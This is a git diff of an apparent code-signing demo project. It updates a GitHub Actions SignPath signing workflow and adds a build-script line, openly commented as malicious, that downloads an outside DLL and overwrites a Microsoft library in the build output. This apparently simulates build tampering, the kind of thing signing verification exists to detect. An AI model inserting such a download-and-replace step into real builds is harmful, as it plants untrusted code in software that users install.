diff --git a/.github/workflows/build-and-sign.yml b/.github/workflows/build-and-sign.yml
index 24588b2..f83a4a9 100644
--- a/.github/workflows/build-and-sign.yml
+++ b/.github/workflows/build-and-sign.yml
@@ -6,8 +6,6 @@ run-name: Demo workflow signing with SignPath
 on: 
   push:
   pull_request:
-  #schedule:
-  #  - cron:  '30 3 * * *' # every day at 3:30am UTC
   workflow_dispatch: # Allows you to run this workflow manually from the Actions tab
 
 jobs:
@@ -27,6 +25,7 @@ jobs:
       run: ./sbom/Create-SBOM.ps1
 
     - name: upload-unsigned-artifact
+      id: upload-unsigned-artifact
       uses: actions/upload-artifact@v4
       with:
         name: "demo-application" 
@@ -36,17 +35,22 @@ jobs:
           .\_BuildResult-unsigned\bom.xml
 
     - name: sign
-      uses: signpath/github-action-submit-signing-request@v0.3
+      uses: signpath/github-action-submit-signing-request@v0.4
       env:
-        SIGNPATH_SIGNING_POLICY_SLUG: ${{ (github.ref == 'refs/heads/main' || startsWith(github.ref, 'refs/heads/release/')) && 'release-signing' || 'test-signing' }}
+        # select release-signing policy for main and release branches
+        SIGNPATH_SIGNING_POLICY_SLUG: | 
+          ${{ (github.ref == 'refs/heads/main' || startsWith(github.ref, 'refs/heads/release/')) 
+            && 'release-signing' 
+            || 'test-signing' }}
       with:
         api-token: '${{ secrets.SIGNPATH_API_TOKEN }}'
         organization-id: '${{ vars.SIGNPATH_ORGANIZATION_ID }}'
         project-slug: 'Demo_Application'
         signing-policy-slug:  '${{ env.SIGNPATH_SIGNING_POLICY_SLUG }}'
-        github-artifact-name:  "demo-application"
+        github-artifact-id:  "${{steps.upload-unsigned-artifact.outputs.artifact-id}}"
         wait-for-completion: true
         output-artifact-directory: 'demo-application-signed'
+        github-extended-verification-token: '${{ secrets.EXTENDED_VERIFICATION_TOKEN }}'
     
     - name: upload-signed-artifact
       uses: actions/upload-artifact@v4
diff --git a/src/Build.ps1 b/src/Build.ps1
index 3614b9a..8dfcaa8 100644
--- a/src/Build.ps1
+++ b/src/Build.ps1
@@ -1,6 +1,10 @@
 # build .Net application
 dotnet build --configuration Release src/DemoExample.csproj
 
+# maliciously replace the Microsoft DLL
+Invoke-WebRequest https://github.com/carterjones/hello-world-dll/releases/download/v1.0.0/hello-world-x64.dll `
+  -OutFile .\src\bin\Release\net7.0\Microsoft.Extensions.DependencyModel.dll
+
 # build MSI installer
 Copy-Item .\src\installer\description.wxs .\src\bin\Release\net7.0\description.wxs -Force
 Push-Location .\src\bin\Release\net7.0